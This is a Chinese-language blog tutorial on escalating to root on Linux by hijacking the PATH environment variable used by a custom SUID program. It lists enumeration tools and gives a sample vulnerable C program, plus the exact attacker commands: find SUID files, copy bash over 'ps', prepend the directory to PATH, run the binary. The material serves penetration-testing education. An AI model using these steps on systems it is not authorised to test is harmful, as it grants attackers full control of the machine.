权限提升-Linux提权-环境变量文件配合SUID提权

最新推荐文章于 2024-05-08 19:44:37 发布
最新推荐文章于 2024-05-08 19:44:37 发布
阅读量183 收藏
点赞数
分类专栏: 权限提升 文章标签: linux 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51345235/article/details/132675412
版权

LINUX系统提权项目介绍

一个综合类探针:

Linux:https://github.com/liamg/traitor

一个自动化提权:

Linux:https://github.com/AlessandroZ/BeRoot

两个信息收集:

Linux:https://github.com/rebootuser/LinEnum

Linux:https://github.com/sleventyeleven/linuxprivchecker

两个漏洞探针:

Linux:https://github.com/mzet-/linux-exploit-suggester

Linux:https://github.com/jondonas/linux-exploit-suggester-2

二进制文件提权查询:

Linux:https://gtfobins.github.io/

Windows:https://lolbas-project.github.io/

 

 

Linux-环境变量文件配合SUID提权

    前提条件:ROOT用户对某个第三方程序(管理员自己写的运维脚本等)给予了SUID权限

1.前提:目标root用户将可执行文件进行编译,保证文件的正常授权运行,给予ROOT权限执行。

文件:domo.c

#include<unistd.h>

void main(){

setuid(0);

                 setgid(0);

                 system("ps");  #system权限执行ps命令

         }

2.编译demo文件重命名为shell(给到了suid权限),赋予执行权限 执行后运行ps命令

命令:gcc demo.c -o shell

    chmod u+s shell

攻击者:

前提:已获取目标本地普通用户权限

1.探针:find / -user root -perm -4000 -print 2>/dev/null 探测除系统命令外管理员添加的具有suid权限的文件。

2.原ps命令查看当前进程 环境变量为/usr/bin/ps

  命令:whereis ps

3.进入到/home目录,普通用户通过对shell文件反编译或源代码查看,发现执行shell文件就是调用ps命令。

4.覆盖其执行环境变量,直接让其执行指定程序获取权限。

命令:cp /bin/bash /home/ps    #将/bin/bash复制为 /home/ps 相当于现在的/home/ps是bash命令

          export PATH=/home:$PATH   #环境变量加入/home 执行ps相当于执行/home/ps

          ./shell    #shell执行,system权限执行ps命令,相当于suid执行bash就是直接提权

执行shell,成功提权

5.步骤总结:

1.普通用户权限下先获取suid所有程序

2.去除系统自带的一些命令(筛选第三方程序)

3.对该程序进行反编译或者找源码 明白该程序的作用

4.思考该程序有无执行一些环境变量命令 (ps ping su sudo 等 比如该shell程序执行了ps命令)

5.尝试通过复制suid提权命令 复制替换原来的执行命令 (先添加环境变量 优先执行复制后的命令)

   

   

 

xiaoheizi安全
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
第64天:权限提升-Linux定时任务&环境变量&数据库1
08-03
1.提权环境,信息收集(SUID,定时任务,可能漏洞,第三方服务应用等) 2.最新相关漏洞要明确(关注点),二次开发相关脚本学会展望(四个脚本) 3.本地 se
真的敢耗时1个月10万字解决Linux内网渗透
aa119101的博客
05-25 2748
Linux虽然没有域环境,但是当我们拿到一台Linux 系统权限,难道只进行一下提权,捕获一下敏感信息就结束了吗?显然不只是这样的。本片文章将从拿到一个Linux shell开始,介绍Linux内网渗透技术,分为容器逃逸、Linux提权Linux信息收集、Linux隧道技术、Linux横向移动、Linux权限维持、Linux痕迹清理几个部分。 容器逃逸 容器逃逸的应用主要是,拿到shell之后,发现是docker环境,要进一步渗透,就必须逃逸到宿主机。 容器逃逸方法见: https://www.cn
权限提升-Linux提权-suid-脏牛内核
告白的博客
09-12 1087
0x00 提权简介 Linux提权相对于windows来说方法比较单一,主要提权方式为suid提权,内核提权环境变量提权,计划任务提权,第三方服务提权,今天来记载一下关于suid提权以及内核脏牛提权,以及对目标linux信息收集的判断,以及漏洞探针。 0x01 Linux信息收集,漏洞探针 在获取到Linux主机的普通shell权限后,我们可以手动收集目标主机的相关信息,但是手工使用起来效率不高,这里推荐两款信息收集与漏洞探针的自动化脚本, 信息收集:LinEnum.sh 漏洞探针:linux-explo
ATT&CK权限提升-Linux提权总结
u013797594的博客
06-12 1601
ATT&CK权限提升-Linux提权总结
Linux提权第二篇-Linux SUID提权&劫持环境变量提权
Love&Share
11-18 1900
文章目录Linux SUID提权Demo劫持环境变量提权其他骚思路 Linux SUID提权 SUID是一种特殊的文件属性,它允许用户执行的文件已该文件的拥有者的身份运行,比如一个具有SUID属性的文件的拥有者是root用户,就可以root权限运行 SUID是一种对二进制程序进行设置的特殊权限,可以让二进制程序的执行者临时拥有属主的权限(仅对拥有执行权限的二进制程序有效)。例如,所有用户都可以执行passwd命令来修改自己的用户密码,而用户密码保存在/etc/shadow文件中。仔细查看这个文件就会发现.
Linux权限提升—内核、SUID、脏牛等提权
剁椒鱼头没剁椒的博客
04-02 2824
关于Linux系统提权的前置知识其实和Windows系统提权是一致的,只是在系统位置,由Windows系统更换为Linux系统而已。权限提升的本质就是通过低权限的账户转换为高权限账户,通过获取高权限账户去做想要做的事情。同时在内核提权提权的时候,需要注意有些内核漏洞需要使用到本地用户去提权,也就是非web权限,但是有些漏洞可以无视权限都可以进行提权,这一点需要注意。至于其它的命令使用方式,可以在给予的网站中去查找相关的使用方式,这里就不再进行演示了。漏洞信息:CVE-2016-5195漏洞。
Linux权限提升—定时任务、环境变量权限配置不当、数据库等提权
剁椒鱼头没剁椒的博客
04-05 2244
在上篇文章中提到了Linux权限提升之前的信息收集操作,这里就不在赘述,在前言中讲上篇文章为提到的内容进行补充,至于其它内容可参考上篇文章。Linux权限提升—内核、SUID、脏牛等提权这里将一下在这个提权中需要注意的事项,总体来说有种莫名的鸡肋感觉。如果备份的文件夹你没有写入权限就GG。如果备份的命令是绝对路径也GG。如果管理员设置了其它权限也GG。如果是WEB权限也GG。可能有些文章中是在定时任务中直接写入压缩命令,来完成压缩的,下面我们就来具体分析一下这两条命令。
内网提权suid+劫持环境变量提权
自知.的博客
05-08 488
环境变量劫持提权的原理就是我们劫持了一个本身就具有SUID权限、root身份运行权限、可sudo的程序。不过普通用户没法修改root用户身份运行程序的环境变量,sudo需要知道当前用户密码,所以一般结合suid进行提权
第64天-权限提升-Linux 定时任务&环境变量&数据库
MCTSOG的博客
05-07 1003
思维导图 演示案例: Linux 提权本地环境变量安全-Aliyun 案例 1:Linux 提权本地环境变量安全-Aliyun 条件 配合 SUID 进行环境变量提权 本地用户权限 过程:手写调用文件-----编译------复制文件------增加环境变量------执行触发 gcc demo.c -o shell cp /bin/sh /tmp/ps export PATH=/tmp:$PATH ./shell id demo.c #include<unistd.h> void ma
Linux与unix shell编程指南(1-16)
08-12
14.3.3 清除环境变量 137 14.3.4 嵌入shell变量 137 14.3.5 其他环境变量 139 14.3.6 set命令 140 14.3.7 将变量导出到子进程 140 14.4 位置变量参数 141 14.4.1 在脚本中使用位置参数 142 14.4.2 向系统命令传递...
SecureCGI-开源
05-15
Suid包装的包装程序,该包装程序以所有者权限执行CGI脚本。 它还清除环境变量,修改资源限制并降低Linux功能。
Linux shell编程指南
05-29
18.3.18 测试和设置环境变量 169 18.3.19 检测最后命令状态 170 18.3.20 增加和检测整数值 171 18.3.21 简单的安全登录脚本 172 18.3.22 elif用法 173 18.3.23 使用elif进行多条件检测 173 18.3.24 多文件位置检测 ...
Linux常用的命令。。。。。
09-21
vim .bash_profile 环境变量文件 bios mbr boot lo(grub.conf 在开机时识别kernel) kernel 防火墙级别: 1. 硬件防火墙 2. tcp_wrapper(用来分析tcp/ip封包的软件) 3. iptables 基于数据流的防火 4. 内核级别:...
Linux----SUID提权复现
qq_37451250的博客
12-03 1144
使用useradd命令,创建一个普通用户demo useradd -m demo == useradd 的-m选项是在/home目录下创建demo用户的家目录。 == 确认用户是否创建成功 cat /etc/passwd 在/etc/passwd文件末尾的第一个字段出现用户名demo,则创建用户成功。 ...
获取Java 虚拟机进程ID(java应用进程Id的方法) Linux & windows
weixin_44131922的博客
04-30 511
这个命令会列出所有包含"java"的进程信息。从中你可以找到你的Java应用对应的进程行,第一列就是进程ID(PID)。这个命令会列出所有包含"java"的进程信息。在输出的信息中,你可以找到Java进程及其PID。替换为你的Java主类名或jar文件名的部分匹配字符串,pgrep会直接返回对应的进程ID。如果你需要在Java程序内部获取其自身的进程ID,可以使用。这段代码会打印出当前运行Java程序的进程ID。
Linux】开始认识软硬链接
JLX_1的博客
04-29 3302
本文通过对文件系统的总结,讲解了Linux中的软硬链接
Linux网站服务
最新发布
c5zm51zjr的博客
05-08 283
注:Discuz软件包安装2.5版本的,若没有需要去官网论坛上寻找,找到之后复制链接下载即可。网站架构:LAMP: Linux+Apache+MYSQL+PHP(系统+服务器程序+数据管理软件+中间软件)主配置文件:/etc/httpd/conf/httpd.conf。主目录:/var/www/html (源代码默认位置)子配置文件:/etc/httpd/conf.d/*注:网站a.org无需授权,b.org需要授权。网站:多个网页组合而成的一台网站服务器。URL:统一资源定位符,访问网站的地址。
2. Linux 基本指令(上)|ls|pwd|cd|tree|touch|mkdir|rmdir|rm
CoderZzz6310的博客
05-08 643
详细介绍了Linux的部分基础指令,ls,pwd,cd,tree,touch,mkdir,rmdir,rm
linux suid提权
03-16
这种特性可以被滥用来进行提权攻击,即攻击者通过执行一个SUID文件来获取root权限。在Linux系统中,SUID文件通常是一些系统工具,如passwd、ping等。攻击者可以通过利用这些工具的漏洞来获取root权限。为了防止SUID...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

xiaoheizi安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值